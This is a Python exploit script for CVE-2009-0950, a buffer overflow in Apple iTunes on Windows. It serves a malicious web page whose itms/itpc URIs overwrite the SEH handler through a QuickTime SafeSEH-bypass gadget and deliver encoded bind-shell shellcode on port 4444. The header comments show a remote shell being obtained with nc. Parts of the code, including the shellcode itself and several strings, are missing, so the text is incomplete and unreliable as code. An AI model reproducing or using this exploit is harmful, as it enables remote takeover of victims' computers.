Apple iTunes (Windows) - itmsitcp Remote Buffer Overflow

Type exploitpack
Reporter ryujin
Modified 2009-06-12T00:00:00


Apple iTunes (Windows) - itmsitcp Remote Buffer Overflow

# Apple iTunes itms/itcp BOF Windows Exploit
# Matteo Memelli | ryujin __A-T__
# Spaghetti & Pwnsauce - 06/10/2009 
# CVE-2009-0950
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack  canary protection. Increasing buffer  size leads to
# SEH overwrite but it seems that the Access Violation needed to get  our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the  vulnerability from  Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10, 
# iTunes,
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
# ryujin:Desktop ryujin$ ./ 
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__
# [+]
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from:
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 4444
# Connection to 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\Program Files\Mozilla Firefox> 

from socket import *

html = """
  <head><title>iTunes loading . . .</title>
   function openiTunes(){document.location.assign("itms://");}
   function prepareStack(){document.location.assign("%s");}
   function ownSeh(){document.location.assign("%s");}
   function ipwn(){
   function main() {
    // Increase this timeout if your iTunes takes more time to load!
  <body onload="main();">
    <p align="center">
    <b>iTunes URI Bof Exploit Windows Version CVE-2009-0950</b>
    <p align="center"><b>ryujin __ A-T __</b></p>
    <p align="center"><b></b></p>
    <p align="center">
    iTunes starting... wait for 20 secs; if you get an error, click "Ok"
    in the MessageBox before checking for your shell on port 4444 :)<br/>
    If victim host is not connected to the internet, exploit will fail
    unless iTunes is already opened and you disable "openiTunes" javascript
    <h2 align="center">
    <b><u>This exploit works if opened from Firefox not from IE!</u></b>
    <p align="center">
    After exploitation iTunes crashes, you need to kill it from TaskManager
    <br/>have fun!</br>

# Alpha2 ASCII  printable  Shellcode  730 Bytes, via  EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode  is modified
# in order to obtain register alignment and to  reset ESP and EBP we  mangled
# before. Rest of decoded shellcode is Metasploit  bind  shell  on  port 4444
# EXITFUNC=thread
# Padding
pad0x1          = "\x41"*425

# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align           = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10

# Padding
pad0x2          = "\x41"*570                                   

# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret             = "\x2a\x5e\x21\x67"

# Let the dance begin... Point EBP to encoded jmp                                                               
align_for_jmp   = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7

jmp_back        = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
# Padding
pad0x3          = "\x43"*162                                   

# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1            = "itms://:" + "\x41"*200 + "/" 
url2            = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
                               align_for_jmp + jmp_back + pad0x3 
payload         = html % (url1, url2)

print "[+] iTunes URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__"
print "[+]"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("", 80))
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
print "[+] Payload sent, wait 20 secs for iTunes error!"

# [2009-06-12]